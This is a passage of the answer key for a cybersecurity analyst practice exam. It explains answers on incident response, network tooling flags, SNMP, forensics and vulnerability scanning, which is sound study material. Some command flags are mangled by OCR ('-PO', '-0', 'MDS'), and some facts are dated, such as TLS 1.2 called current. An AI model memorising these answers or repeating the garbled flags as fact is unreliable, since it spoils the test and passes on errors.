the NIST incident response process. While this might occur in the preparation phase, it is 
intended to improve the analysis process. 


A. Susan knows that Windows domain services can be blocked using a network firewall. 
As long as she builds the correct ruleset, she can prevent external systems from sending 
this type of traffic to her Windows workstations. She may still want to segment her net- 
work to protect the most important workstations, but her first move should be to use her 
firewalls to prevent the traffic from reaching the workstations. 


C. Fred’s SNMP command requested the route table from the system called devicel. 
This can be replicated on the local system using netstat -nr. The traceroute command 
provides information about the path between two systems. The route command could be 
used to get this information, but the command listed here adds a default gateway rather 
than querying current information. ping -r records the route taken to a site for a given 
number of tries (between 1 and 9). 


D. When the Internet Engineering Task Force (IETF) endorsed SNMP v3.0 as a standard, 
it designated all earlier versions of SNMP as obsolete. Shannon should upgrade this device 
to SNMP 3.0. 


B. The systems in the containment network are fully isolated from the rest of the network 
using logical controls that prevent any access. To work with the systems that he needs to 
access, Frank will need to either have firewall rules added to allow him remote access to 
the systems or physically work with them. 


B. On Linux systems that use the bash shell, Shome/.bash_history will contain a log of 
recently performed actions. Each of the others was made up for this question. 


B. NIST SP-800-88 recommends clearing media and then validating and documenting 
that it was cleared. Clearing uses logical techniques to sanitize data in user-addressable 
storage locations and protects against noninvasive data recovery techniques. This level of 
security is appropriate to moderately sensitive data contained on media that will remain in 
an organization. 


C. Task 3 strikes the best balance between criticality and difficulty. It allows her to 
remediate a medium criticality issue with an investment of only 6 hours of time. Task 
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2 is higher criticality but would take 12 weeks to resolve. Task 1 is the same criticality 
but would require a full day to fix. Task 4 is lower criticality but would require the same 
amount of time to resolve as Task 1. 


D. The use of a stolen cookie is the hallmark of a session hijacking attack. These attacks 
focus on taking over an already existing session, either by acquiring the session key or 
cookies used by the remote server to validate the session or by causing the session to pass 
through a system the attacker controls, allowing them to participate in the session. 


C. Pete’s organization is using an agent based, out-of-band NAC solution that relies on a 
locally installed agent to communicate to existing network infrastructure devices about the 
security state of his system. If Pete’s organization used dedicated appliances, it would be an 
in-band solution, and of course not having an agent installed would make it agentless. 


B. The registry contains autorun keys that are used to make programs run at startup. In 
addition, scheduled tasks, individual user startup folders, and DLLs placed in locations 
that will be run by programs (typically malicious DLLs) are all locations where files will 
automatically run at startup or user login. 


B. The biggest issue in this scenario is that both factors are knowledge-based factors. A 
true multifactor system relies on more than one type of distinct factor including some- 
thing you know, something you have, or something you are (and sometimes where you 
are). This system relies on two things you know, and attackers are likely to acquire both 
from the same location in a successful attack. 


A. The order of volatility of data measures how easy the data is to lose. The Volatility 
Framework is a forensic tool aimed at memory forensics, while data transience and data 
loss prediction are not common terms. 


C. Mika is using netcat to grab the default HTTP response from a remote server. Using 
netcat like this allows penetration testers to gather information quickly using scripts or 
manually when interaction may be required or tools are limited. 


B. Playbooks contain specific procedures used during a particular type of cybersecurity 
incident. In this case, the playbook entry addresses malware command and control traf- 
fic validation. Creating a CSIRT or IR plan occurs at a higher level, and IR-FAQs is not a 
common industry term. 


D. Kristen should upgrade the web server to the most current secure version of TLS: TLS 
1.2. SSL 3.0 has vulnerabilities similar to those in TLS 1.0 and is not a suitable alterna- 
tive. IPsec is not effective for web communications. Disabling the use of TLS would jeop- 
ardize the security of information sent to and from the server and would create additional 
risk, rather than remedying the situation. 


C. Relatively few organizations run honeypots because of the effort required to maintain 
and analyze the data they generate. DNS queries and other traffic logs, threat intelligence 
feeds, and notifications from staff are all common information sources for a variety of 
types of incident detection. 


55. 


56. 


57. 


58. 


59. 


60. 


61. 


62. 


63. 


Chapter 5: Practice Exam 1 405 


D. Context-based authentication may leverage a wide variety of information. Potential 
attributes include time of day, location, device fingerprint, frequency of access, user roles, 
user group memberships, and IP address/reputation. 


B. Application or token-based multifactor authentication ensures that the exposure of a 
password because of successful phishing email does not result in the compromise of the 
credential. Password complexity increases fail to add security since complex passwords 
can still be compromised by phishing attacks, biometric multifactor authentication is 
typically expensive to implement and requires enrollment, and OAuth-based single sign- 
on will not prevent phishing attacks; instead, it can make it easier for attackers to move 
between multiple services. 


D. In an open redirect attack, users may be sent to a genuine authentication server and 
then redirected to an untrusted server through the OAuth flow. This occurs when the 
authentication server does not validate OAuth server requests prior to redirection. 


B. While packet capture can help Max document his penetration test and gather 
additional information about remote systems through packet analysis, as well as help 
troubleshoot connection and other network issues, sniffers aren’t useful for scanning for 
vulnerabilities on their own. 


D. Rich should not attempt to solve this problem on his own or dictate a specific solution. 
Instead, he should work with the business intelligence team to find a way to both meet 
their business requirements and accomplish the security goals achieved by scanning. 


D. The Gramm-Leach-Bliley Act (GLBA) applies specifically to the security and privacy 
of information held by financial institutions. HIPAA applies to healthcare providers. PCI 
DSS applies to anyone involved in the processing of credit card transactions. This does 
include financial institutions but is not limited to those institutions as it also applies to 
merchants and service providers. Sarbanes-Oxley applies to all publicly traded corpora- 
tions, which includes, but is not limited to, some financial institutions. 


C. Policies that allow employees to bring personally owned devices onto corporate net- 
works are known as bring your own device (BYOD) policies. Corporate-owned person- 
ally enabled (COPE) strategies allow employees to use corporate devices for personal use. 
SAFE is not a mobile device strategy. 


B. Richard knows that mounting forensic images in read-only mode is important. To 
prevent any issues with executable files, he has also set the mounted image to noexec. He 
has also taken advantage of the automatic filesystem type recognition built into the mount 
command and has set the device to be a loop device, allowing the files to be directly 
interacted with after mounting. 


D. Blind SQL injection vulnerabilities are difficult to detect and are a notorious source of 
false positive reports. Javier should verify the results of the tests performed by the devel- 
opers but should be open to the possibility that this is a false positive report, as that is the 
most likely scenario. 
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B. netcat is often used as a port scanner when a better port scanning tool is not avail- 
able. The -z flag is the zero I/O mode and is used for scanning. While -v is useful, it isn’t 
required for scanning and won’t provide a scan by itself. The -sS flag is used by nmap and 
not by netcat. 


D. Intrusion alarms designed to alert staff to a facility break-in are a clear example of 
physical controls because they are monitoring for a physical intrusion. The design of the 
alarm is not an administrative control, but the process for reacting to alarms would fall 
into that category. Physical intrusion alarms are not logical controls, although a network 
intrusion detection system would be a logical control. There is no indication that this 
alarm will compensate for the failure to meet a different control objective, so this is not a 
compensating control. 


A. During penetration tests, the red team members are the attackers, the blue team 
members are the defenders, and the white team establishes the rules of engagement and 
performance metrics for the test. 


C. Lauren knows that the file she downloaded and computed a checksum for does not 
match the MDS checksum that was calculated by the providers of the software. She does 
not know it the file is corrupt or if attackers have modified the file but may want to con- 
tact the providers of the software to let them know about the issue, and she definitely 
shouldn’t execute or trust the file! 


C. Microsoft announced the end of life for Internet Explorer and will no longer support it 
in the future. However, they still provide support for Internet Explorer 11, which is widely 
used. This is the only version of Internet Explorer currently considered secure. 


D. While it may be tempting to assign blame based on an IP address, attackers frequently 
use compromised systems for attacks. Some may also use cloud services and hosting com- 
panies where they can purchase virtual machines or other resources using stolen credit 
cards. Thus, knowing the IP address from which an attack originated will typically not 
provide information about an attacker. In some cases, deeper research can identify where 
an attack originated, but even then knowing the identity of an attacker is rarely certain. 


B. Auth. log will contain new user creations and group additions as well as other useful 
information with timestamps included. /etc/passwd does not include user creation dates 
or times. Checking file creation and modification times for user home directories and bash 
sessions may be useful if the user has a user directory and auth. log has been wiped or is 
unavailable for some reason. 


B. Completely removing the systems involved in the compromise will ensure that they 
cannot impact the organization’s other production systems. While attackers may be 
able to detect this change, it provides the best protection possible for the organization’s 
systems. 


C. Michelle should deploy the patch in a sandbox environment and then thoroughly test 
it prior to releasing it in production. This reduces the risk that the patch will not work 
well in her environment. Simply asking the vendor or waiting 60 days may identify some 
issues, but it does not sufficiently reduce the risk because the patch will not have been 
tested in her company’s environment. 
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C. The most likely scenario is that Kent ran the scan from a network that does not have 
access to the CRM server. Even if the server requires strong authentication and/or encryp- 
tion, this would not prevent ports from appearing as open on the vulnerability scan. The 
CRM server runs over the web, as indicated in the scenario. Therefore, it is most likely 
using ports 80 and/or 443, which are part of the default settings of any vulnerability 
scanner. 


D. nmap provides multiple scan modes, including a TCP SYN scan, denoted by the -sS 
flag. This is far stealthier than the full TCP connect scan, which uses the -sT flag. Turning 
off pings with the -PO flag helps with stealth, and setting the scan speed using the -T flag 
to either a 0 for paranoid or a 1 for sneaky will help bypass many IDSs by falling below 
their detection threshold. 


C. Control objectives provide organizations with high-level descriptions of the controls 
that they can implement for their information technology systems. The framework orga- 
nizes objectives by subject-matter domain. The process descriptions provide a common 
language and business process model for the organization. Maturity models provide orga- 
nizations with a means to assess their adherence to the standard. 


C. Of the criteria listed, the operating system installed on the systems is the least likely to 
have a significant impact on the likelihood and criticality of discovered vulnerabilities. All 
operating systems are susceptible to security issues. 


A. In this case, the identity or network location of the server is not relevant. Donna is 
simply interested in the most critical vulnerability, so she should select the one with the 
highest severity. In vulnerability severity rating systems, severity 5 vulnerabilities are the 
most critical, and severity 1 are the least critical. Therefore, Donna should remediate 
the severity 5 vulnerability in the file server. 


A. Policies are the highest-level component of an organization’s governance documen- 
tation. They are set at the executive level and provide strategy and direction for the 
cybersecurity program. Standards and procedures derive their authority from policies. 
Frameworks are not governance documents but rather provide a conceptual structure for 
organizing a program. Frameworks are usually developed by third-party organizations, 
such as ISACA or ITIL. 


A. Vulnerability scanning information is most effective in the hands of individuals who 
can correct the issues. The point of scans is not to “catch” people who made mistakes. 
Chris should provide the administrators with access. The security team may always moni- 
tor the system for unremediated vulnerabilities, but they should not act as a gatekeeper to 
critical information. 


C. SNMP v3 is the current version of SNMP and provides message integrity, authentica- 
tion, and encryption capabilities. Chris may still need to address how his organization 
configures SNMP, including what community strings they use. SNMP versions 1 and 2 do 
not include this capability, and version 4 doesn’t exist. 


D. Bare-metal virtualization does not impose any requirements on the diversity of guest 
operating systems. It is very common to find Linux and Windows systems running on the 
same platform. Bare-metal virtualization does not use a host operating system. Instead, it 
runs the hypervisor directly on top of the physical hardware. 
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B. This vulnerability results in an information disclosure issue. Paul can easily correct it 
by disabling the directory listing permission on the cgi-bin directory. This is unlikely to 
affect any other use of the server because he is not altering permissions on the CGI scripts 
themselves. Blocking access to the web server and removing CGI from the server would 
also resolve the vulnerability but would likely have an undesirable business impact. 


C. Observable occurrences are classified as events in NIST’s scheme. Events with negative 
consequences are considered adverse events, while violations (or event imminent threats of 
violations) are classified as security incidents. 


A. This is a valid DNS search result from dig. In this dig request, the DNS server located 
at 172.30.0.2 answered Sally’s request and responded that the comptia.org server is 
located at 198.134.5.6. 


C. The most likely issue is that an intrusion prevention system is detecting the scan as an 
attack and blocking the scanner. If this were a host or network firewall issue, Fran would 
most likely not be able to access the server using a web browser. It is less likely that the 
scan is misconfigured given that Fran double-checked the configuration. 
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C. The presence of this vulnerability does indicate a misconfiguration on the targeted 
server, but that is not the most significant concern that Ty should have. Rather, he should 
be alarmed that the domain security policy does not prevent this configuration and should 
know that many other systems on the network may be affected. This vulnerability is not 
an indicator of an active compromise and does not rise to the level of a critical flaw. 


B. SNMP v1 through v2c all transmit data in the clear. Instead, Chris should move his 
SNMP monitoring infrastructure to use SNMP v3. Adding complexity requirements helps 
to prevent brute-force attacks against community strings, while TLS protects against data 
capture. Using different community strings based on security levels helps to ensure that a 
single compromised string can’t impact all of the devices on a network. 


C. This vulnerability has a low severity, but that could be dramatically increased if the 
management interface is exposed to external networks. If that were the case, it is possible 
that an attacker on a remote network would be able to eavesdrop on administrative con- 
nections and steal user credentials. Out-of-date antivirus definitions and missing security 
patches may also be severe vulnerabilities, but they do not increase the severity of this spe- 
cific vulnerability. The lack of encryption is already known because of the nature of this 
vulnerability, so confirming that fact would not change the severity assessment. 


B. Both ports 22 and 23 should be of concern to Nancy because they indicate that the 
network switch is accepting administrative connections from a general-use network. 
Instead, the switch should only accept administrative connections from a network man- 
agement VLAN. Of these two results, port 23 should be of the greatest concern because it 
indicates that the switch is allowing unencrypted telnet connections that may be subject to 
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eavesdropping. The results from ports 80 and 8192 to 8194 are of lesser concern because 
they are being filtered by a firewall. 


B. All of the scenarios described here could result in failed vulnerability scans and are 
plausible on this network. However, the fact that the Apache logs do not show any denied 
requests indicates that the issue is not with an .htaccess file on the server. If this were 
the case, Evan would see evidence of it in the Apache logs. 


C. The shim cache is used by Windows to track scripts and programs that need specialized 
compatibility settings. It is stored in the registry at shutdown, which means that a thorough 
registry cleanup will remove program references from it. The master file table (MFT), vol- 
ume shadow copies, and prefetch files can all contain evidence of deleted applications. 


D. Fuzz testing involves sending invalid or random data to an application to test its ability 
to handle unexpected data. Fault injection directly inserts faults into error-handling paths, 
particularly error-handling mechanisms that are rarely used or might otherwise be missed 
during normal testing. Mutation testing is related to fuzzing and fault injection, but rather 
than changing the inputs to the program or introducing faults to it, mutation testing 
makes small modifications to the program itself. Stress testing is a performance test that 
ensures applications and the systems that support them can stand up to the full produc- 
tion load. 


C. While TCP ports 21, 23, 80, and 443 are all common ports, 515 and 9100 are com- 
monly associated with printers. 


B. The netstat command is used to generate a list of open network connections on a 
system, such as the one shown here. traceroute is used to trace the network path 
between two hosts. ifconfig is used to display network configuration information on 
Linux and Mac systems. The sockets command does not exist. 


C. NIST identifies four major categories of security event indicators: alerts, logs, publicly 
available information, and people both inside and outside the organization. Exploit 
developers may provide some information but are not a primary source of security event 
information. 


D. A host that is not running any services or that has a firewall enabled that prevents 
responses can be invisible to nmap. Charles cannot determine whether there are hosts on 
this network segment and may want to use other means such as ARP queries, DHCP logs, 
and other network layer checks to determine whether there are systems on the network. 


D. The Business Impact Assessment (BIA) is an internal document used to identify and 
assess risks. It is unlikely to contain customer requirements. Service Level Agreements 
(SLAs), Business Partner Agreements (BPAs), and Memorandums of Understanding 
(MOUs) are much more likely to contain this information. 


C. Web servers commonly run on ports 80 (for HTTP) and 443 (for HTTPS). Database 
servers commonly run on ports 1433 (for Microsoft SQL Server), 1521 (for Oracle), or 
3306 (for MySQL). Remote Desktop Protocol services commonly run on port 3389. Sim- 
ple Mail Transfer Protocol (SMTP) runs on port 25. There is no evidence that SSH, which 
uses port 22, is running on this server. 
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C. You may not be familiar with Scalpel or other programs you encounter on the exam. 
In many cases, the problem itself will provide clues that can help you narrow down your 
answer. Here, pay close attention to the command-line flags, and note the -o flag, a com- 
mon way to denote an output file. In practice, Scalpel automatically creates directories for 
each of the file types that it finds. Selah simply needs to visit those directories to review 
the files that she has recovered. She does not need to use another program. The filenames 
and directory structures may not be recoverable when carving files. 


C. Trusted foundries are part of the Department of Defense’s program that ensures that 
hardware components are trustworthy and have not been compromised by malicious 
actors. A TPM is a hardware security module, OEMs are original equipment manufacturers 
but may not necessarily have completed trusted hardware sources, and gray-market providers 
sell hardware outside of their normal or contractually allowed areas. 


D. Resource exhaustion is a type of structural failure as defined by the NIST threat 
categories. It might be tempting to categorize this as accidental because Adam did not 
notice the alarms; however, accidental threats are specifically caused by individuals doing 
routine work who undermine security through their actions. In this case, the structural 
nature of the problem is the more important category. 


B. While all of these policies may contain information about data security, Ben is specifi- 
cally interested in grouping information into categories of similar sensitivity. This is the 
process of data classification. A data retention policy would contain information on the 
data life cycle. An encryption policy would describe what data must be encrypted and 
appropriate encryption techniques. A data disposal policy would contain information on 
properly destroying data at the end of its life cycle. 


A. The Windows equivalent to the Linux ifconfig command is ipconfig. netstat 
displays information about open network connections rather than network interface 
configuration. The ifconfig and netcfg commands do not exist on Windows. 


B. The PHP language is used for the development of dynamic web applications. The pres- 
ence of PHP on this server indicates that it is a web server. It may also be running 
database, time, or network management services, but the scan results provide no evidence 
of this. 


B. CompTIA includes patching, permissions, scanning, verifying logging, and communi- 
cating to security monitoring systems in the validation stage. This differs from the NIST 
standard, which groups activities into eradication and recovery phases. 


D. NIST describes attrition attacks as attacks that employ brute-force methods to com- 
promise, degrade, or destroy systems, networks, or services. A DDoS attack seeks to 
degrade or prevent access to systems, services, or networks. 


A. An internal network vulnerability scan will provide an insider’s perspective on the 
server’s vulnerabilities. It may provide useful information, but it will not meet Taylor’s 
goal of determining what an external attacker would see. 


A. FTP sends the username in a separate packet. Chris can determine that this was 
an FTP connection, that the password was gnome123, and that the FTP server was 
137.30.120.40. 
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B. The spike shown just before July appears to be out of the norm for this network since it 
is almost four times higher than normal. Cynthia may want to check to see what occurred 
during that time frame to verify whether it was normal traffic for her organization. 


A. Evidence production procedures describe how the organization will respond to sub- 
poenas, court orders, and other legitimate requests to produce digital evidence. Monitor- 
ing procedures describe how the organization will perform security monitoring activities, 
including the possible use of continuous monitoring technology. Data classification proce- 
dures describe the processes to follow when implementing the organization’s data classifi- 
cation policy. Patching procedures describe the frequency and process of applying patches 
to applications and systems under the organization’s care. 


D. This Windows system is likely running an unencrypted (plain-text) web server, as well 
as both the Microsoft RPC and Microsoft DS services on TCP 135 and 335, respectively. 
SSH would typically be associated with port 22, while email via SMTP is on TCP port 25. 


B. The IT Infrastructure Library (ITIL) provides guidance on best practices for imple- 
menting IT service management, including help desk support. ISO provides high-level 
standards for a wide variety of business and manufacturing processes. COBIT provides 
control objectives for IT governance. PCI DSS provides security standards for handling 
credit card information. 


D. Adding new signatures (prior to an incident) is part of the preparation phase because it 
prepares an organization to detect attacks. 


D. For best results, Mike should combine both internal and external vulnerability scans 
because this server has both public and private IP addresses. The external scan provides 
an “attacker’s eye view” of the web server, while the internal scan may uncover vulner- 
abilities that would be exploitable only by an insider or an attacker who has gained access 
to another system on the network. 


C. Windows Defender is set to Disabled, and the network protections are set to Manual, 
meaning that the system’s antivirus is likely disabled. This does not necessarily mean that 
the system is infected with malware, but some malware does attempt to disable antivirus 
software. The Windows Event Collector that is set to Manual collects remote WMI events 
and will not prevent the system from logging normally. 


C. NIST recommends the usage of NTP to synchronize clocks throughout organizational 
infrastructure, thus allowing logs, alerts, and other data to be analyzed more easily dur- 
ing incident response. Manually setting clocks results in time skew, incorrect clocks, and 
other time-related problems. 


A. TCP 135, 139, and 445 are all common Windows ports. The addition of 3389, the 
remote desktop port for Windows, makes it most likely that this is a Windows server. 


D. Adam’s Snort rule is looking for a specific behavior, in this case, web traffic to 
example.com’s download script. Rules looking for anomalies typically require an under- 
standing of “normal,” while trend-based rules need to track actions over time, and 
availability-based analysis monitors uptime. 
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C. Identity providers (IDPs) provide identities, make assertions about those identities to 
relying parties, and release information to relying parties about identity holders. Relying 
parties (RP), also known as service providers (SP), provide services to members of the fed- 
eration and should handle the data from both users and identity providers securely. The 
consumer is the end user of the federated services. 


B. While all of the techniques listed may be used to engage in credential theft, 
phishing is, by far, the most common way that user accounts become compromised in 
most organizations. 


C. In most organizations, Emily’s first action should be to verify that the system is not 
one that belongs to the organization by checking it against her organization’s asset inven- 
tory. If the system is a compromised system on the wrong network, she or her team will 
need to address it. In most jurisdictions, there is no requirement to notify third parties or 
law enforcement of outbound scans, and since the guest wireless is specifically noted as 
being unauthenticated, there will not be authentication logs to check. 


D. The strings command prints strings of printable characters in a file and does not 
show Linux permission information. The contents of the sudoers file, the output of the 
groups command, and the stat command can all provide useful information about user 
or file permissions. 


C. The scenario describes a dual-control (or two-person control) arrangement, where 
two individuals must collaborate to perform an action. This is distinct from separation 
of duties, where access controls are configured to prevent a single individual from accom- 
plishing two different actions that, when combined, represent a security issue. There is 
no indication that the company is performing privileged account monitoring or enforcing 
least privilege given in this scenario. 


A. The PCI DSS compensating control procedures do not require that compensating con- 
trols have a clearly defined audit mechanism, although this is good security practice. They 
do require that the control meet the intent and rigor of the original requirement, provide 
a similar level of defense as the original requirement, and be above and beyond other 
requirements. 


B. This error indicates that the digital certificate presented by the server is not valid. Lou 
should replace the certificate with a certificate from a trusted CA to correct the issue. 


D. Data retention policies specify the appropriate life cycle for different types of informa- 
tion. In this example, a data retention policy would likely have instructed the organization 
to dispose of the unneeded records, limiting the number that were compromised. A data 
ownership policy describes who bears responsibility for data and is less likely to have a 
direct impact on this incident. An acceptable use policy could limit the misuse of data by 
insiders, but there is no indication that this was an insider attack. An account manage- 
ment policy may be useful in pruning unused accounts and managing privileges, but there 
is no indicator that these issues contributed to the impact of this incident. 


A. Incident data should be retained as necessary regardless of media life span. Retention 
is often driven by the likelihood of civil or criminal action, as well as by organizational 
standards. 
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D. An outage is an availability issue, data exposures are confidentiality issues, and the 
integrity of the email was compromised when it was changed. 


B. The best way to resolve this issue would be to upgrade to OpenSSH 6.4, as stated 

in the solution section of the report. Disabling the use of AES-GCM is an acceptable 
workaround, but upgrading to a more current version of OpenSSH is likely to address 
additional security issues not described in this particular vulnerability report. There is no 
indication that an operating system upgrade would correct the problem. The vulnerability 
report states that there is no malware associated with this vulnerability, so antivirus sig- 
nature updates would not correct it. 


A. The firewall rules continue to allow access to the compromised systems, while prevent- 
ing them from attacking other systems. This is an example of segmentation. Segmentation 
via VLANs, firewall rules, or other logical methods can help to protect other systems, 
while allowing continued live analysis. 


C. Jennifer can use this information to help build her baseline for response times for the 
AWS server. A 200 ms response time for a remotely hosted server is well within a reason- 
able range. There is nothing in this chart that indicates an issue. 


A. Scapel is a carving tool designed to identify files in a partition or volume that is miss- 
ing its index or file allocation table. DBAN is a wiping tool, parted is a partition editor, 
and dd is used for disk duplication. You may encounter questions about programs you are 
unfamiliar with on the exam. Here, you can eliminate tools that you are familiar with like 
DBAN, parted, or dd and take a reasonable guess based on that knowledge. 


A. Ben’s best option is to look for a hibernation file or core dump that may contain evi- 
dence of the memory-resident malware. Once a system has been shut down, a memory- 
resident malware package will be gone until the system is re-infected, making reviews 

of the registry, INDX files, and volume shadow copies unlikely to be useful. Since the 
system was shut down, he won’t get useful memory forensics from a tool like the Volatility 
Framework unless the machine is re-infected. 


A. The <SCRIPT> tag is used to mark the beginning of a code element, and its use is indic- 
ative of a cross-site scripting attack. <XSS> is not a valid HTML tag. The <B> (for bold 
text) and <EM> (for italics) tags are commonly found in normal HTML input. 


C. An intrusion prevention system (or other device or software with similar capabilities) 
to block port scans based on behavior is the most effective method listed. Not registering 
systems in DNS won’t stop IP-based scans, and port scans will still succeed on the ports 
that firewalls allow through. Port security is a network switch—based technology designed 
to limit which systems can use a physical network port. 


B. NIST’s functional impact categories range from none to high, but this event fits the 
description for a medium event; the organization has lost the ability to provide a critical 
service to a subset of system users. If the entire network had gone down, he would have 
rated the event as a high-impact event, whereas if a single switch or the network had a 
slowdown, he would have categorized it as low. 
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B. Operating system fingerprinting relies on the differences between how each operat- 
ing system (and sometimes OS versions) handles and sets various TCP/IP fields, including 
initial packet size, initial TTL, window size, maximum segment size, and the don’t frag- 
ment, sackOK, and nop flags. 


B. Management Information Bases (MIBs) provide monitoring groups to get information 
about networks, including flow-based information, statistics, history, alarms, and events. 


D. The order of volatility of common storage locations is as follows: 

1. CPU cache, registers, running processes, and RAM 

2. Network traffic 

3. Disk drives (both spinning and magnetic) 

4. Backups, printouts, and optical media (including DVD-ROMs and CDs) 
Thus, the least volatile storage listed is the DVD-ROM. 


A. This vulnerability states that there is a missing patch to the Windows operating 
system. In a bare-metal hypervisor, the only place that Windows could be running is as a 
guest operating system. Therefore, this is the location where Jerry must apply a patch. 


C. The hallmark of a Tier 3 risk management program is that there is an organization-wide 
approach to managing cybersecurity risk. In a Tier 4 program, there is an organization- 
wide approach to managing cybersecurity risk that uses risk-informed policies, processes, 
and procedures to address potential cybersecurity events. 


D. The repeated SYN packets are likely a SYN flood that attempts to use up resources 
on the target system. A failed three-way handshake might initially appear similar but will 
typically not show this volume of attempts. A link failure would not show traffic from a 
remote system, and a DDoS would involve more than one system sending traffic. 


D. Oracle databases default to TCP port 1521. Traffic from the “outside” system is being 
denied when it attempts to access an internal system via that port. 


D. The ATA Secure Erase command wipes all of an SSD, including host-protected area 
partitions and remapped spare blocks. Degaussing is used for magnetic media such as 
tapes and is not effective on SSDs, while zero writing or using a pseudorandom num- 
ber generator to fill the drive will not overwrite data in the host-protected area or spare 
blocks, which are used to wear level most SSDs. 


D. Data classification is a set of labels applied to information based upon their degree of 
sensitivity and/or criticality. It would be the most appropriate choice in this scenario. Data 
retention requirements dictate the length of time that an organization should maintain 
copies of records. Data remnance is an issue where information thought to be deleted 

may still exist on systems. Data privacy may contribute to data classification but does not 
encompass the entire field of data sensitivity and criticality in the same manner as data 
classification. For example, a system may process proprietary business information that 
would be very highly classified and require frequent vulnerability scanning. Unless that 
system also processed personally identifiable information, it would not trigger scans under 
a system based solely upon data privacy. 
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D. The output that Bob sees is from a password-cracking tool. He can tell this by reading 
the header and realizing that the file contains unhashed passwords. Of the tools listed, 
only Cain & Abel and John the Ripper are password-cracking utilities. Metasploit is an 
exploitation framework, while ftk is a forensics toolkit. Cain & Abel is a Windows-based 
tool, and this appears to be command-line output. Therefore, the output is from John the 
Ripper, a command-line password-cracking utility available for all major platforms. 


C. Nmap is an open source port scanning tool and does not have web application vulner- 
ability scanning capability. Acunetix and Nikto are dedicated-purpose web application 
vulnerability scanners. QualysGuard is a more general vulnerability scanning tool, but it 
does have web application scanning capabilities. 


B. PCI DSS only requires scanning on at least a quarterly basis and after any significant 
changes. Weekly scanning is a best practice but is not required by the standard. Peter must 
hire an approved scanning vendor to perform the required quarterly external scans but 
may conduct the internal scans himself. All systems in the cardholder data environment, 
including both the website and point-of-sale terminals, must be scanned. 


A. The vulnerability description mentions that this is a cross-site scripting (XSS) vulner- 
ability. Normally, XSS vulnerabilities are resolved by performing proper input validation 
in the web application code. However, in this particular case, the XSS vulnerability exists 
within Microsoft IS server itself and not in a web application. Therefore, it requires a 
patch from Microsoft to correct it. 


C. Fast flux DNS networks use many IP addresses behind one (or a few) fully qualified 
domain names. Logging DNS server queries and reviewing them for hosts that look up the 
DNS entries associated with the command-and-control network can quickly identify com- 
promised systems. 


Unfortunately, antivirus software is typically not updated quickly enough to immediately 
detect new malware. Since the fast flux DNS command and control relies on frequent 
changes to the C&C hosts, IP addresses change quickly, making them an unreliable detec- 
tion method. Finally, reviewing email to see who received the malware-laden message is 
useful but won’t indicate whether the malware was successful in infecting a system 
without additional data. 


A. The -0 flag enables operating system detection for nmap. 


A. Mika is using both a knowledge-based factor in the form of her password and some- 
thing she has in the form of the token. Possession of the token is the “something she has.” 


B. The most appropriate step for Jose to take is to discuss his opinion with his manager 
and see whether the manager is willing to change the guidelines. As a security profes- 
sional, it is Jose’s ethical responsibility to share his opinion with his manager. It would 
not be appropriate for Jose to act against his manager’s wishes. Jose should also not ask to 
speak with his manager’s supervisor until he has had an opportunity to discuss the issue 
thoroughly with his manager. 
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A. Susan’s best option is to use an automated testing sandbox that analyzes the applica- 
tions for malicious or questionable behavior. While this may not catch every instance 

of malicious software, the only other viable option is decompiling the applications and 
analyzing the code, which would be incredibly time-consuming. Since she doesn’t have the 
source code, Fagan inspection won’t work (and would take a long time too), and running 
a honeypot is used to understand hacker techniques, not to directly analyze application 
code. 


B. Firewall rules are an example of a logical control because they are technical controls 
that enforce confidentiality, integrity, and availability in the digital space. Locks and keys 
and security guards are examples of physical controls. Background checks are an example 
of an administrative control. 


C. A data loss prevention system may be able to intercept and block unencrypted sensi- 
tive information leaving the web server, but it does not apply cryptography to web com- 
munications. Transport layer security (TLS) is the most direct approach to meeting Chris’ 
requirement, as it encrypts all communication to and from the web server. Virtual private 
networks (VPNs) may also be used to encrypt network traffic, adding a layer of security. 
Full disk encryption (FDE) may also be used to protect information stored on the server in 
the event the disk is stolen. 


C. Network Access Control (NAC) can combine user or system authentication with 
client-based or clientless configuration and profiling capabilities to ensure that systems are 
properly patched and configured and are in a desired security state. Whitelisting is used 
to allow specific systems or applications to work, port security is a MAC address filtering 
capability, and EAP is an authentication protocol. 


D. The best option presented is for Chris to remove the drive and purge the data from it. 
Destroying the drive, unless specified as allowable in the lease, is likely to cause contrac- 
tual issues. Reformatting a drive that contains highly sensitive data will not remove the 
data, so neither reformatting option is useful here. In a best-case scenario, Chris will work 
to ensure that future devices either have built-in encryption that allows an easy secure 
wipe mode or a dedicated secure wipe mode, or he will work to ensure that the next 

lease includes a drive destruction clause. 


A. The most reasonable response is for Rhonda to adjust the scanning parameters to 
avoid conflicts with peak business periods. She could ask for additional network band- 
width, but this is likely an unnecessary expense. Adjusting the business requirements is 
not a reasonable response as security objectives should be designed to add security in a 
way that allows the business to operate efficiently, not the other way around. Ignoring the 
request would be very harmful to the business relationship. 


B. When restoring from a backup after a compromise, it is important to ensure that the 
flaw that allowed attackers in is patched or otherwise remediated. In many environments, 
backups can be restored to a protected location where they can be patched, validated, and 
tested before they are restored to service. 
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D. Recurring beaconing behavior with a changing set of systems is a common char- 
acteristic of more advanced malware packages. It is most likely that this system was 
compromised with malware that deleted itself when its ability to check in with a 
command-and-control system was removed, thus preventing the malware from being 
captured and analyzed by incident responders. 


A. ISO 27001 provides guidance on information security management systems. ISO 9000 
applies to quality management. ISO 11120 applies to gas cylinders. ISO 23270 applies to 
programming languages. 


B. /etc/shadow contains password hashes but does not provide information about 
privileges. Unlike /etc/passwd, it does not contain user ID or group ID information and 
instead contains only the username and hashed password. 


/etc/passwd, /etc/sudoers, and /etc/group may all contain evidence of the 
www user receiving additional privileges. 


A. Logging of application and server activity may provide valuable evidence during a 
forensic investigation. The other three controls listed are proactive controls designed to 
reduce the risk of an incident occurring and are less likely to directly provide information 
during a forensic investigation. 


A. This is an appropriate case for an exception to the scanning policy. The server appears 
to be secure, and the scanning itself is causing a production issue. Gary should continue 
to monitor the situation and consider alternative forms of scanning, but it would not be 
appropriate to continue the scanning or set an artificial deadline that is highly unlikely to 
be met. Decommissioning the server is an excessive action as there is no indication that it 
is insecure, and the issue may, in fact, be a problem with the scanner itself. 


A. The best defense against a man-in-the-middle attack is to use HTTPS with a digital 
certificate. Users should be trained to pay attention to certificate errors to avoid accepting 
a false certificate. Input validation and patching would not be an effective defense against 
man-in-the-middle attacks because man-in-the-middle attacks are network-based attacks. 
A firewall would be able to block access to the web application but cannot stop a man-in- 
the-middle attack. 


B. While nmap provides service version identification, it relies heavily on the information 
that the services provide. In some cases, fully patched services may provide banner infor- 
mation that does not show the minor version or may not change banners after a patch, 
leading to incorrect version identification. 


B. Tyler should initiate his organization’s change management process to begin the patch- 
